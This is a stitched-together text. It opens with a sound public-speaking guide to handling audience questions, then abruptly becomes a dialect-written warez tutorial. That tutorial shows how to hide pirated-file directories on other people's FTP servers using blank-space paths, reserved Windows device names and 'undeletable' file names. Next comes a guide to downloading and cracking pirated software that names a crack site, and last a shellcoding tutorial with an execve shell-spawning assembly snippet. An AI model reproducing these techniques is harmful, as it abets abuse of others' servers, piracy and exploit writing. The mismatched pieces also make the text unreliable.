Next to the invitation itself, the offhanded comment, “Oh, by the way, you should allow a little time at the end for questions,” is the greatest cause for concern for many speakers. Why? Several reasons: They fear not knowing the answer to a specific question. They fear that someone will question their authority or the credibility of their information. They fear stammering and faltering with unplanned answers. They fear a hostile audience or participant. They fear losing control of the audience and the situation. They may even feel “put upon” for being placed on the spot with an unpopular answer or an unpopular subject.

And any or all of these may cause embarrassment.

Why, then, should speakers put themselves through the anxiety of anticipating these predicaments and devastating results? First of all, the audience expects time for questions—as their God-given right to force the speaker to “meet the press” so to speak, particularly on controversial points.

But in addition to audience expectations and needs, questions also benefit you, the speaker. First, questions allow you to apply the key points specifically to your audience’s situation. Audience analysis, of course, is part of your preparation, but questions give you one last opportunity to make specific application. Questions also provide feedback on how clear you were and offer a chance to correct wrong impressions. When you get an off-the-wall question, you immediately recognize that one of your key points has been perhaps misleading for or misunderstood by your listener.

Another advantage of question-answer periods is to establish further rapport with your audience. Your answers show that you care about individual needs and understanding. They show genuine goodwill in giving value to your audience. Here’s your opportunity to be spontaneous and witty. And nothing shows your depth of knowledge, credibility, and communication skills as vividly as unrehearsed fielding of unplanned questions.

Finally, questioning periods give you “leeway” in judging the appropriate timing. Five or ten minutes either added or subtracted from your speech can be corrected in the time allotted for questions—a reassuring cushion for you, particularly on a first-time speech run.

Let’s get into the mechanics, then, of handling question-answer periods effectively.

Anticipate and Prepare for Questions

Audience analysis, the first step in preparing a speech, should always include consideration of questions the group will have about your information and opposing viewpoints. Plan for these questions specifically in your question-answer period and prepare succinct responses.

Here’s an acronym we use to coach students in formulating a strong, memorable, spur-of-the-moment answer:
S = Summary (One-sentence summary statement of your answer)
E = Evidence (Key points to support your answer)
E = Example (Specific illustration that will make the key points memorable)
R = Restatement (Restatement of summary)

Question: “Do you think leasing space in this building will solve our overcrowding problem permanently?”
Answer:

(S) “No, I can’t see leasing more space here as a permanent solution.

(E) “The extra space available is not suitable for the kinds of shelving we want to install. For another thing, the extra space does not open to the outside corridor, and therefore, the traffic to the registration desk will still create the main peak-hour waiting lines. And neither will the extra leasing space accommodate the additional 200 or so visitors we plan to have during the spring.

(E) “If you’ll remember, two years ago we tried—with no success—to alter the traffic pattern by leasing more space on the bottom floor. People just would not walk to the end of the hall to take the alternate route. You remember Frank Tanner’s comments about his people not even having time to reach the coffee machine in 15 minutes, much less get a cup of coffee.

(R) “So, no, I don’t consider leasing more space in this building as a permanent solution to the overcrowding problem.”

With this format, you should find it much easier to be a SEER and to think on your feet. The idea is to have a thinking format to gather and present your ideas in a concise way for maximum impact and recall.
One last tip: You may want to avoid a particular issue in your prepared remarks on the lucky chance that the matter won’t surface in the question-answer period. But don’t count on it. Be prepared with an answer or at least an acknowledgment of any opposing viewpoint.

Encourage Questions When They are Slow to Come

Don’t assume that if the group voices no questions there are none. Audience members hold their tongues for any number of reasons: They haven’t shifted gears yet to active participation. They think that a question is stupid and that they should have understood your information the first time around. They may also think their question and your answer would be of limited interest and, therefore, hate to monopolize others’ time for their own clarification. They may feel particularly inept at wording their question. They may not want to risk others’ hostility with a controversial viewpoint or question. They may have understood your speech so thoroughly that they have no questions.

And your greatest three worries: They may not have understood your talk well enough to ask a question! They may have no interest at all in your subject! Or they may have written you off for credibility reasons.
To encourage questions, make sure your body language shows openness to the audience—upturned palms, wide-open arms, alert posture, raised eyebrows, a smile, movement toward the audience. All these gestures and movements show that you welcome their interaction.

Extend an invitation to questions with comments such as: “What questions do you have?” rather than “Do you have questions?” The least effective invitation is to mumble, “Are there questions?” as you glance up briefly, leaf through your notes again, or leave the stage.

Affirmations from you after questions (“Excellent question,” “Thank you for asking that,” “I’m glad someone brought that up because…”) also encourage other listeners to take a risk with their own questions.
If you anticipate difficulty in generating questions, you can distribute index cards at the beginning or end of the speech, asking participants to jot their questions down and pass them to the front. That way, you can weed through the cards, selecting the best ones. This procedure gives you maximum control and flexibility while still being responsive to the audience.

You can also generate questions with an opinion poll: “How many of you think that it would be feasible to raise this amount of money in six months’ time? In a year?” They raise their hands after each. “Lisa, you responded on six months. What gives you that confidence?” Such probing relaxes the group, encourages openness, and starts momentum for expressing opinions.

Pose your own question: “A question many groups frequently ask and one that may also be of interest to you is….” Or: “A question Bill Maxwell raised at our last meeting may still warrant discussion. He wanted to know if….” Or: “An issue I didn’t get into in my earlier remarks is Z—do any of you have a particular concern about how…?
Or you may want to repeat questions or comments overheard at the beginning: “I overheard someone earlier express the idea that…. How many of you agree?” This help on your part gives audiences time to consider their own questions and shows that you’re taking their questions seriously.

Maybe most important of all: When you do receive a question, be brief in your answer. If you take ten minutes to answer the first one or two, some participants will fear antagonizing less interested audience members by asking another question that may lengthen your speech another half hour.

Determine Whether to Repeat or Not Repeat the Question

If the sound is so poor in the room that questions from the audience can’t be heard, certainly you should repeat them for all to hear. You may want to repeat some questions, if not all, simply to give yourself time to think.
But to repeat a question in a small-group setting where everyone obviously heard is redundant and makes you sound like a parrot.

And you never want to repeat hostile questions because it’s difficult to do so without sounding hostile or defensive yourself. The other danger is that you reinforce the negative thought or the opposing viewpoint in your audience’s mind.

Maintain Control of the Audience

Set boundaries at the beginning of the session as to what kinds of questions you will take, the number of questions you have time for, and who will respond to each.

“I’ll ask you not to bring up the issues of X and Y for security reasons.” “We won’t let ourselves get into the Z matter because of the current litigation.” “I prefer to deal with questions only in the area of A and B rather than C, which headquarters can more appropriately deal with.” All these comments at the beginning set the stage for your control of what is to follow.

Then when someone asks an irrelevant question, you can defer the answer to a private dialogue afterward and not waste the group’s time or seem unresponsive to their needs. You will also limit the occasion for questions unrelated to your topic or expertise.

And no one says that you must answer all the questions. If you consider a question out-of-line, confidential, personal, irrelevant, or of little interest to the rest of the group, you can always deflect it, reroute it, challenge it, or simply defer answering it. “I’m afraid that’s out of my area of expertise; would someone else like to respond?” “Jack, I’m curious about why you’re asking that question; didn’t you and Mark work those issues out earlier?” “Do we really need to answer that question, or would it be more advantageous to focus on…?”

Finally, take questions in turn and don’t let a few monopolize: “I regret that we’ll not have time to finish with all the questions from those of you who are so perceptive with additional thoughts. But we do need to wrap this up. I’ll be around here for a few minutes if any of you would like to follow up one on one.”

Listen to the Question

Listening to the questions may not be as easy as it sounds. If you’re nervous, if you’re lambasting yourself about a previous error, if you’re worrying about the time, or if you’re threatened by the hostile body language of someone in the room, it’s easy to miss the point of what the questioner is asking. Poor listening may cause you to fumble a question you could have easily fielded.

Compounding the matter is the fact that the asker may give too much background or irrelevant information before getting to the real point. And the asker may not have a clear understanding of what his or her real question is!
To avoid giving an off-base answer, clarify with a probing question of your own: “Let me see if I understand your question correctly. You want to know if…?” Or: “Is your question thus-and-so? Or are you really asking if it is possible to…?”

Give your best effort to understanding the true question rather than concentrating on preparing your reply to contradict or refute the asker’s viewpoint. Finally, show that you are listening with attentive body language, such as leaning forward, head tilted in reflection, and steady eye contact.

Think Before You Answer

Even when an answer pops quickly to mind, pause before rushing ahead. With frequently asked questions, it’s tempting to give the canned answer when, with a little forethought, you can customize your answer, making it even more responsive to the asker.

To allow even more thinking time, you can use props such as removing or replacing eye glasses, taking a sip of water, striding to another spot in the room before turning to face the group, or tilting your head and rubbing your chin as if reflecting on the brilliance of the question.

You can also buy thinking time by commenting on the question itself: “That’s a tough question.” “That’s a perceptive question.” “I anticipated someone asking that and I don’t know if I’m going to have an answer that you’ll agree with or find completely satisfying, but….”

You may say honestly: “Let me think about that a moment” and then repeat the question to yourself aloud, “Ummm, what would I recommend if….” Such a pause and repetition renews the audience’s attention as they anticipate why the question required serious reflection.

You may refuse to answer at all: “I’m not at liberty to answer that now.” “That piece of the puzzle is still in the works now. May I get back to you on that later?”

Overview Your Answer Briefly, Then Elaborate

The question-answer period is not the place to redo your speech. When asked a question, respond with a headline message, then elaborate very briefly. Your audience will understand the elaboration much better within the context of your overview answer.

Here are a couple of examples of this technique: “In a word, my answer is yes. Management is aware of the problem and we’re trying to correct it. Last week, for example….” Another example of overviewing and then elaborating: “I don’t think it’s too expensive, no. It costs less than X and Y. Here’s how I think we can finance the first phase….”

Direct the Answers to the Entire Audience

Begin your answer while maintaining eye contact with the asker, and then after a few seconds glance away and sweep the entire group. Direct the remainder of your answer to everyone and make your comments generic enough for their interests also.

Remember that you do not have to satisfy every questioner completely because some will never stop their follow-up questions. Others may persist in presenting their own viewpoints even after you’ve given your answer. Keep in mind that you don’t have to answer every question fully. Just make your point briefly, break eye contact with the asker, then turn to the entire group and ask for the next question.

Use Your Answers to Reinforce Your Points

“I’m glad you brought that issue up because it will give me opportunity to elaborate on…” realigns the question with one you really want or need to answer. You can also refocus the question to make it bigger or smaller: “The larger issue that most of the industry will be concerned with is…; therefore, let me put my answer in a larger context.” Or: “Yes, that is the big-picture problem, but let me bring it a little closer to home with the more direct issue of….”

Go in either direction with the question to reinforce what you think is the essential viewpoint or message of interest.

Polish Your Techniques for Handling “Problem” Questions

Show-Off Questions

These are the questions asked merely to show the asker’s own knowledge of the subject or accomplishments. Recognize the reason behind the question, then comment only briefly and go to the next question. If this kind of questioner persists, you may have to add a comment such as the following to keep him or her from monopolizing the situation: “I’m not sure I’m understanding your question in all this. Would you please ask the specific question again.”

The asker will generally fumble into focusing on a question that you can answer briefly and use to regain control.

Off-the-Subject Questions

If the question is completely off the wall, you may simply gaze at the asker momentarily and then move on without a response at all—as if you didn’t quite understand the point.
You may ask if someone else has a similar concern. If so, answer briefly. If not, ask for permission to hold the question until the end, “if there’s time.”

Or you may comment: “Interesting idea, but how does that relate to Y?” The asker will usually mumble that it doesn’t and acquiesce or ask a more relevant question.

“That’s interesting and something worth further thought, but right now I’d like to spend our time focusing on….” will usually put the matter to rest. Or: “I hadn’t expected a question of that nature. May we discuss that later—just you and I?” The asker will usually be reinforced by the personal attention offered and you won’t lose the rest of the audience.

Limited-Interest Questions

When possible, bridge from the limited perspective to the larger issue at hand: “With reference to your specific situation, my opinion is that…, but the larger issue here seems to be….” Continue by making application to the entire audience.

Ask: “Does anyone else here have that concern?” Pause and look around, then continue: “Well, let me give you a brief answer and let’s talk about that later one on one—will that be more helpful?”
Then break eye contact and move on.

“Dumb” Questions

Don’t chance cutting someone off with what sounds like a “dumb” question but may be a very intelligent one after all. Rather, the “dumb” question may be a result of advanced, complex thinking that may not have occurred to you. The question may be quite relevant and you simply don’t understand the relevance because of limited expertise. Probe further to make sure you understand completely: “I’m afraid I’m not following the question. Would you explain further exactly how X relates to Y?”

Rambling or Long-Winded Questions

You may interrupt with, “Excuse me, but do I understand your central question to be…?” Or: “Excuse me, but I think I now have the drift of your question. My response is simply that….”

Unintelligible Questions

If you cannot understand the question because the asker has a heavy dialect or is fuzzy in his wording, pick one phrase or part of the question to deal with and frame a question that you think he or she may be asking.

Multiple Questions

In response to long, complex questions with irrelevant information thrown into the pot, you may have difficulty remembering everything that was asked along the way. When that’s the case, either answer the questions you remember, answer the last one, answer the most important one, or ask the questioner to repeat them slowly while you write them down. Then respond one by one.

You can defer some of them with: “If I understand completely, you’ve asked me four good questions. Let me answer the first two and come back to the others later if there’s time.”

Hypothetical Questions

Be careful that you don’t get trapped here. Express your disagreement with assumptions and say so when you think such a situation is highly unlikely. End with: “I prefer to concern myself with the real here-and-now in formulating policy on this issue. For the present situation, I still consider….”

Or refocus with: “James, we have so many real-life situations at hand that I’d rather stick with those concrete facts, if you don’t mind.” Or: “There are so many unknowns and variables in hypothetical questions that it would be difficult to give a meaningful answer to that concern. In the case of Z, is your interest more about…?”
Forced “Yes or No,” “A or B” Questions

If you can answer with a simple yes or no, do so. But if you prefer not to see the matter in black or white, say so: “I think we have to be careful here not to back ourselves into a corner with either answer. Either simple answer can keep us from seeing the extenuating circumstances that might alter….” Or: “I don’t think a simple yes or no would do justice to the issue.” Or: “I think we’d make a mistake to put it in either-or terms. There are so many issues that can affect….”

Finally, you can expand your options: “I think we have more than those two alternatives. Rather than A or B, a third possibility is to….”

Questions You Don’t Know the Answers to

You may defer the question to someone in the room with more expertise in that area: “I’m not sure I can adequately elaborate on that. Jeff, will you offer your expertise here?” You will win respect for your honesty and the support of the more experienced person you deferred the question to.
Never be afraid to say simply, “I don’t know. I’ll have to check on that information and get back to you.” And then do so.

Hostile Questions

If you expect hostile questions, you may request that all questioners state their names, companies, and titles before they ask questions. Some will think twice before they blurt out a hostile comment and risk associating it with their company. Anonymity is great protection.

Try to determine the reason for any hostility. By acknowledging and sympathizing with the legitimate feelings of the asker, you may defuse the hostility and help him or her receive your answer in a much less hostile manner.
The questioner’s hostility may be a reflection of his business agenda or his personality and may have little to do with you. Simply let the asker vent his emotions, and then go to the next question after a brief statement of your opinion.

Some questioners use a pseudo-courteous tone to wrap a hostile question. If so, reply just as courteously, but without the sarcasm.

You may even try a little humor or drama before answering, such as throwing your hand across your heart as if you’d been shot. “You may have hit me on that one.” Then proceed to answer as calmly as you can.
For frivolously hostile questions, you can relay the question back to the asker or to another person: “Mr. Jones, I feel uncomfortable in responding to that question. Maybe you’d just like to tell us how you would answer that question were you in my place?”

If you think the hostility is limited to one person’s viewpoint, you can let the group respond on your behalf: “Do any of the rest of you agree with that viewpoint? Does anyone else want to respond?” The silence will be a great answer. Or you may add your own in a courteous way.

Don’t feel that you have to refute the opposing view in great detail, particularly if the hostile view was not well supported itself. Simply comment: “No, I don’t think that’s the case.” No elaboration. Your answer will sound authoritative and final and will put the asker in the position of being rude and argumentative if he/she rephrases and continues.

If you can easily do so, rephrase a legitimate question minus the hostile tone: The question is: “Why are you demanding six years’ funding up front?” Repeat the question aloud: “Why do we think six years’ funding at the outset is necessary? Well, first of all….”

Above all, do not match hostility with hostility; instead, try to remain congenial in your answer. The audience will almost always side with (or at least empathize with and respect) the person who remains the calmest and most courteous.

Remember that the way you answer questions will always be remembered more clearly and for much longer than the content of your answer.

Conclude the Question-Answer Period with a Summary

Don’t let your speech limp to a close after the last question with “Well, if there are no more questions, that’s about all, folks.” Instead, firmly conclude with your prepared closing remarks. Here is where you actually use your prepared closing—that pithy quote or challenging question that will leave your audience charged and ready to act. In fact, some speakers prepare two closings: the one that ends their prepared speech and leads into the question-answer period and then one that wraps up the entire session with high impact.

If you’re lucky, you may happen to get a question that’s a great lead-in to your prepared closing. If so, use it as impetus to your conclusion and you’ll look even more eloquent and in control.

Maybe the very idea of questioning got off to a bad start when we as children were told never to question our parents’ decisions or commands. And schools sometimes reinforce the idea that questions negatively challenge the instructor’s authority. Certainly, we all remember the loudmouthed smart aleck whose every question was a challenge. Or maybe we’ve seen too many LA Law dramas where the judge instructs the witness in a booming tone: “Just answer the question.”

Don’t let those experiences keep you from making your speech all it can be. Allow questions and watch your audience’s mood, interest, and body language switch from low gear to high. Questions clarify, tailor, and reinforce your key message. To your audience, they are your statement of openness, genuineness, courtesy, and goodwill.

Introduction

This tutorial should not be used to exploit webservers. Some of de techniques used here have certain outputs that can crash old servers makin’ them unusable. Throughout this tutorial, techniques will be passed on from exploits found in de ‘windows’ OS. That ‘ACTUALLY’ helps in de prevention of deletion. There are lots of methods in stoppin’ a deleter, without de ANY restrictions set on de server but most have some weak point. After comin’ across four new techniques, makin’ a folder ‘invisible’ or undetectable from an ftp client LIST fuction. Makin’ folders/directories inaccessable and clone prevention, creatin’ smart directories which slows
down de users attempt. I’m sure most users would thank me for this, ‘undeletable files’ after experiencin’ rock solid protection and safe files.

Invisible Directories

The idea of invisible directoires came about when I came across paths that were “/ /example/” and was not listed in de main folder but was still ‘accessable’. These can be created in all directories without oder users knowin’ it exists unless bein’ searched for ‘MANUALLY’, which takes ages at de present time to search through each folder for “/ /”.

Creatin’ Invisible Directories

1. before
./pub/
./images/
./_vti_pvt/
./_vti_cnf/
./_vti_log/
./temp/

2. after
./ /~/temp/tagged/for/team/warezpiratez/fxp/ <- hidden folder
./pub/
./images/
./_vti_pvt/
./_vti_cnf/
./_vti_log/
./temp/

To create de hidden folders, make a new dir. as follows usin' this method. [backslash][space][backslash][foldername1][backslash][foldername2].

ie. / /foldername1/foldername2/...

The 'space' isn't a name but a 'character' that does not get listed, derefore makin' de directories impossible to view.

NOTE: Makin’ de hidden folders several LAYERS/SUB-DIRECTORIES deep is recommended.

ie. / / / /~/temp/tagged/for/ /team/warez/ /piratez/fxp/

This technique is not ‘anti-deletion proof’ but hidden from deletion proof! Read more to find out how to combine ALL THREE TECHNIQUE to make it ‘REMOTELY’ impossible to delete. Please note de ‘quotes’, REMOTELY in a sense that remote/local host.

Inaccessable Directories

Inaccessable directories prevents de user from ‘enterin'’ de folder. The user will not be able to enter de folders unless knowin’ de ‘entire’ remote path.

Creatin’ Inaccessable Directories

1. before
./temp/tagged/for/team/warezpiratez/fxp/
./pub/
./images/
./_vti_pvt/
./_vti_cnf/
./_vti_log/
./temp/

2. after
./COM1 / temp/tagged/for/team/warezpiratez/fxp/ <- inaccessable directories, due to 'COM1' former windows bug.
./pub/
./images/
./_vti_pvt/
./_vti_cnf/
./_vti_log/
./temp/

To create inaccessable folders, use de followin' list of 'UNUSABLE NAMES'

COM1 COM1 COM3 COM4 (Windows COM PORTS)
LPT1 LPT2 LPT3 LPT4 (Windows Printer Ports)
AUX
NUL

Make a new folder "COM1[space][backslash][space][backslash] ie. /COM1 / /

NOTE: This makes de folder inaccessable, even to de siteadmin.(unless accessed from DOS, local with access to de machine.)

To use de dir. Create a new folder called “COM1[space][backslash][space][foldername1][backslash][foldername2] ie. /COM1 / / ~/temp/tagged/

NOTE: This folder is still inaccessable, if a user attempts to enter it. To gain access to de folder, de ‘full path’ must be known. To enter de folder use de RAW command ‘CWD’ change dir. path. to enter de folder. ie. CWD /COM1 / / ~/temp/tagged/ and voila de folder is usable and workin’.

TIP: Creatin’ de folder ’several’ LAYERS/SUB-DRIECTORIES deep. It is impossible to enter.

Smart Directories

This technique involves, de creation of directories that are ‘COPYRIGHT’. How’s that for a simple description. The idea is to create directories that would contain [periods] thorough each of de subdirectories or segmenets. The use of this is quite sipmle, note de word ‘COPYRIGHT. Most users use de ftp://login :password at ip :port/path/ format for faster access to an ftp.

Creatin’ Smart Directories

To create ’smart’ directories. Make de folder names of each sub directories contain a period before, inside, and after words within de subdirectories creatin’ a fake ‘file’ recognition. The Widows based clients will assume de folders to be files with windows usin’ its 8.3 format for file names.

1. before
ftp://anonymous@anonymous@123.456.789:21/temp/tagged/for/team/warezpiratez/f
xp/

2. after
ftp://anonymous@anonymous@123.456.789:21/temp/tagged ./for . /team. /. warez
.piratez/fxp

NOTE: Be as creative as possible with de dot formation, to prevent COPYING of all folders through each directories. The idea is to make de directories act as file extensions derefore when copied, it will be ‘queued’ and de user has to enter de directories MANUALLY. Oder ‘SYMBOLS’ can be used NOT ONLY just periods. But I find this most common, if de creator intends to create a catch phrase ‘memorable’ to him alone.

QUEUE: 1. /temp/tagged ./for . /team. /. warez .piratez/fxp <- result of folder extensions

Undeletable Files

Sad that we had to resolve to this but, this might be de end of deletion as we speak. I find no oder method out dere that can accomplish this task except settin’ restrictions from de server. This method involves de file bein’ self-protected. Meanin’ de files are ‘accessable’/'downloadable’ but can NOT be deleted. The idea is to make de file corrupted/crash makin’ it ‘in use’.

Creatin’ Undeletable Files

To create a self protected file, rename de entire file includin’ de extensions to de followin’ format:

filename[space][period]/[space]/ ie. filename ./ / The / / in de name as shown above in de previous example of creatin’ invisible directories makes de .extesion impossible to view on de pub as a windows recognized mime but, once dowloaded it will be shown and accessable. How’s that for wits.

1. before
warezpiratez.rar <- rar mime, winrar.

2. renamin’
warezpiratez ./ /

3. results
-warezpiratez <- unknown file(undeletable,downloadable) <- file will take de correct mime format on localhost

Ultimate Protection

The ultimate protection is obviously, yourself and your wits against de deleters. Use private FTPs, get fast sites T1+, but in this case, it would be de combination of all four techniques. Usin’ them into one major and thoughtout plan.

Creatin’ The Ultimate Protection

To create de ultimate protection that is desirable, first of all, create de invisible folders as shown above, several sub.dirs deep. Then creatin’ an ‘inaccesable’ folder within those invisible folders. Then de next step is to create those smart directories so it slows down ANY attempt to gain full access, and also it makes to user run into inaccessable folders. The idea is to trap de user before those folders usin’ de smart directories idea. I didn’t think that was ingenieus but just common sense and seemd smart!.

1. before
/temp/tagged/for/team/warezpiratez/fxp/ <- no protection

2. after
/ / /./ ./COM1 / temp/tagged ./for . /team. /. warez .piratez/fxp <-
protection(still weak)

NOTE: You can be creative with this technique, make it more complex, I didn’t do it in this tutorial because den that would make you just confused. I hope this helps, and please understand. It is not hard, unless you didn’t read from de Introduction. I made this well detailed. For it to be as simple as possible.

FAQ

1. What is a SUB-DIRECTORY
- It is de folder that is second/inside anoder folder. ie. firstfolder/subdir/

2. What is a pub
- Short for public ftp. There are, no restrictions/protection on de access over files. Some have them in most cases but den uploads/downloads are denied. Some would not allow fxp.

3. What does all this mean?
- It provides de internet safer from all de deleters.

4. Who are deleters?
- Deleters are mean and NASTY people who deletes files. Consists of spammers too.

0×01.0 - de start

So, you’ve just got a brand new internet connection thin’y installed and it can handle up to 1 meg/sec download. But of course, no good PC without good software, but you know, good software is very expensive and on a beautifull sunday mornin’ you see somethin’ called Warez. Behold our kin’dom and you start drewlin’ a bit untill ur mom comes ragin’ in your room askin’ for you to put de garbage out. After helpin’ your mom out, de PC and fast internet connection is all yours. And so is de free software.

0×02.0 - packaged files.

As you might know, dese software packages are sometimes pretty big in size. To try and reduce de big-file-downloads, de releasers of de package will often use some techniques to reduce de load. Techniques as compressin’, archivin’ and splittin’. Read-on if you dont understand dese words.

0×02.1 - formats & tools.

If you’ve been around more than 1 year on de net, you prolly allready know all this but for de knew people I added this anyways.The basic use of your Windows Operatin’ System is de use of many different files and file-types. One of de most used file-types on de net is ZIP. File-types are also called ‘formats’.

An overview:

ZIP A zipped file is a file thats been archived and compressed.
RAR RAR files are commonly used for archivin’ files; which is puttin’ a large number of files in one file. Compressin’ is optional. File-splittin’ is optional.
ACE About de same as a RAR file, just an oder format and anoder application.

I explain this to you because dese file-types and corespondin’ programs are often, you can even use always here, used when you want to download Warez. The programs you download are almost always archived, compressed or bundled in one of de above formats. Keep readin’ if you didnt knew this

Ok so, now we know de formats of de files were gonna deal with, now de programs. As you have probably figured out allready, dese files arent created by Windows or by hand. Theyre made usin’ specialy designed applications. Ill show you what applications you can use.

WinRAR : My personal favorite. Handles all of de above stated formats and alot, alot more. If you ask for my opinion, I think this is de only program you’ll ever need.

WinZIP : This is a specially designed application for handlein’ ZIPPED files. If you like this one, take it.

WinACE : Anoder multi-file handlin’ tool. Personal opinion: good for splittin’ files, way too big for every-day use for decompression.

I’d say: make your choice. I recommend WinRAR because of it’s simplicity and effectiveness. But hey, I’m not forcin’ you. Just read some info on de sites and make ur choice.

Oh yeah, one last thin’: you’ll notice dese are all Evaluation versions. I suggest you crack them. Look for a good crack for de right version on: www.cracks.am.

0×02.2 - multi-part archives.

These files are archived in multiple parts (with one of de applicatiosn mentioned above). Which means de software was zipped or rarred and divided into files of a smaller size den de whole thin’ togeder. How do you handle this?

Download all de files to one directory.

Check if all files are dere. You can do this by lookin’ at de extensions: *.00, *.01, … If one’s missin’, download de missin’ file again (dere are more sofisticated ways to do this but this is de simplest).

Check if de files are about de same size. For example: de *.04 file must be de same size as de *.05 file, unless de 5th file is de last one.

If deres a file with de extension *.RAR, double click it and u can start unpackin’ de stuff.

If deres no *.RAR, but an *.ACE, do de same, its just an oder format.

Once you unarchived de package, you should have a directory full of files from an instalation or program. But its also possible dere are, with de archived files, some oder thin’s:

• If de software pack is a Warez Group (MYTH, CLASS, Fairlight (FLT), …) release, check if dere’s an EXE file with de package called Install.exe. If it’s dere, you can use that to unpack de files.
• If dere’s no exe in de package, de files are probably just ready to be copied to your directory of choice or ready to be installed.

IMPORTANT : please dont forget to read de NFO file. Its very important. It usually contains all furder information needed for you to successfully install de software. You can open it with NFO-file viewers or in Notepad (set font to: terminal, 6 or 9 pts).

Normally, you’re all done now and ready to start usin’ de software.

Ok, do I hear protest? Yes I do. It goes: “Hell, I downloaded a multi-part package but it has NO RAR OR ACE OR ZIP OR ANYTHING!!!! Just files with extensions called *.001; *.002, …”

You’re right. Although de situation is quite different from de situation above, it’s really not so different when you look closer. Those files are just unarchived de same way:

• Select de first file (*.001).
• Right-click it and select ‘Extract here…’

Watch de progress bar go! You see, its just de same method. You might notice deres only 2 or 3 files decompressed: ISO or CUE and BIN files. Thats fairly normal. Well talk about handlin’ them in topic 0×03.0.

0×02.3 - one-file downloads.

Ok so de stuff u downloaded was none of above. Conclusion: you downloaded one big file. This happens quite often when you download thin’s from fast-workin’ FTPs.

What you need to do now:

• If de file is archived (.rar, .ace, .zip, …), just unarchive it.
• If de file u unrachived is some weird *.ISO or *.CUE file, go to 0×03.0.
• If not, just continue de procedure as stated in 0×02.2.

0×03.0 - a clear view on images.

So when youre readin’ this, u probably have some files called *.ISO or *.CUE. Offcourse you want to install de software as fast as possible. But, deres a little problem here. Those extensions… What de hell are dey? Alienized files? No. Secret CIA files? Nope. You can stop guessin’. Ill tell you: those files are image files.

0×03.1 - what are images?

Image files are big files filled with data. Yea, you can say its a sort of archived file. But deres somethin’ special about them: dey are meant to written on a disc. They were made by special programs so dey could be used to write on a CD-R with a writer and specially designed software.

0×03.2 - ISO files.

ISO is de most used image-format on de net. It has become a standard to any commercial cd-writin’ software to support image-writin’ capabilities, more specific ISO images.

Conclusion: ISO is just an extension for a specific type of image -file. But how do you install your software? You have 2 ways of dealin’ with this:

1) Use de file for what is was created: writin’ it to a CD-R.
2) Extractin’ de contents of an ISO to a certain directory.

First: how to write them to a CD-R…

• Download some CD-R writin’ software (if you dont have it allready).
• Install and crack it.

I recommend Nero Burnin’ Rom. You can download it from WareZone in de Apps section.

• Go buy some CD-R’s
• Fire-up Nero and you can start burnin’. Im not goin’ to explain you how to use Nero. Read de help file about image writin’ and you should be fine. You can also use de wizard which is loaded automatically when you boot Nero.

Second: what to do if you dont got a CD-writer.

• Download some Image handlin’ software.

I recommend WinISO.

• Fire-up WinISO, load your image file and extract it. Again I wont explain how to use WinISO. Check for help files or tutorials on de net, dey should give you all de answers you need.

0×03.3 - CUE & BIN files.

CUE and BIN files always come togeder. The BIN file is comparable with an ISO and de CUE file is just a check, but it is required for any program to write this file correctly. Sometimes, deres an SFV file included. Again this is just a check-up about de file integrity. You can burn and extract dese files de same way i explained in 0×03.2.

0×04.0 - CD Emulation.

Ok, so here’s anoder way to handle ISO images if you don’t have a cd-writer. You can create a virtual cd drive. What’s that? That’s somethin’ you’ll see as a new disk drive in your Windows Explorer. This disk drive represents de contents you would see if you would burn de ISO image to cd!

How to create a virtual cd drive? Download DaemonTools !

Additional help on www.daemon-tools.com

Introduction

This paper assumes a workin’ knowledge of basic shellcodin’ techniques, and x86 assembly, I will not rehash dese in this paper. I hope to teach you some of de lesser known shellcodin’ techniques that I have picked up, which will allow you to write smaller and better shellcodes. I do not claim to have invented any of dese techniques, except for de one that uses de div instruction.

The multiplicity of mul

This technique was originally developed by Sorbo of darkircop.net. The mul instruction may, on de surface, seem mundane, and it’s purpose obvious. However, when faced with de difficult challenge of shrinkin’ your shellcode, it proves to be quite useful. First some background information on de mul instruction itself.

mul performs an unsigned multiply of two integers. It takes only one operand, de oder is implicitly specified by de %eax register. So, a common mul instruction might look somethin’ like this:

movl $0×0a,%eax
mul $0×0a

This would multiply de value stored in %eax by de operand of mul, which in this case would be 10*10. The result is den implicitly stored in EDX:EAX. The result is stored over a span of two registers because it has de potential to be considerably larger than de previous value, possibly exceedin’ de capacity of a sin’le register(this is also how floatin’ points are stored in some cases, as an interestin’ sidenote).

So, now comes de ever-important question. How can we use dese attributes to our advantage when writin’ shellcode? Well, let’s think for a second, de instruction takes only one operand, derefore, since it is a very common instruction, it will generate only two bytes in our final shellcode. It multiplies whatever is passed to it by de value stored in %eax, and stores de value in both %edx and %eax, completely overwritin’ de contents of both registers, regardless of wheder it is necessary to do so, in order to store de result of de multiplication. Let’s put on our mathematician hats for a second, and consider this, what is de only possible result of a multiplication by 0? The answer, as you may have guessed, is 0. I think it’s about time for some example code, so here it is:

xorl %ecx,%ecx
mul %ecx

What is this shellcode doin’? Well, it 0’s out de %ecx register usin’ de xor instruction, so we now know that %ecx is 0. Then it does a mul %ecx, which as we just learned, multiplies it’s operand by de value in %eax, and den proceeds to store de result of this multiplication in EDX:EAX. So, regardless of %eax’s previous contents, %eax must now be 0. However that’s not all, %edx is 0′d now too, because, even though no overflow occurs, it still overwrites de %edx register with de sign bit(left-most bit) of %eax. Usin’ this technique we can zero out three registers in only three bytes, whereas by any oder method(that I know of) it would have taken at least six.

The div instruction

Div is very similar to mul, in that it takes only one operand and implicitly divides de operand by de value in %eax. Also like, mul it stores de result of de divide in %eax. Again, we will require de mathematical side of our brains to figure out how we can take advantage of this instruction. But first, let’s think about what is normally stored in de %eax register. The %eax register holds de return value of functions and/or syscalls. Most syscalls that are used in shellcodin’ will return -1(on failure) or a positive value of some kind, only rarely will dey return 0(though it does occur). So, if we know that after a syscall is performed, %eax will have a non-zero value, and that de instruction divl %eax will divide %eax by itself, and den store de result in %eax, we can say that executin’ de divl %eax instruction after a syscall will put de value 1 into %eax. So…how is this applicable to shellcodin’? Well, deir is anoder important thin’ that %eax is used for, and that is to pass de specific syscall that you would like to call to int $0×80. It just so happens that de syscall that corresponds to de value 1 is exit(). Now for an example:

xorl %ebx,%ebx
mul %ebx
push %edx
pushl $0×3268732f
pushl $0×6e69622f
mov %esp, %ebx
push %edx
push %ebx
mov %esp,%ecx
movb $0xb, %al #execve() syscall, doesn’t return at all unless it fails, in which case it returns -1
int $0×80

divl %eax # -1 / -1 = 1
int $0×80

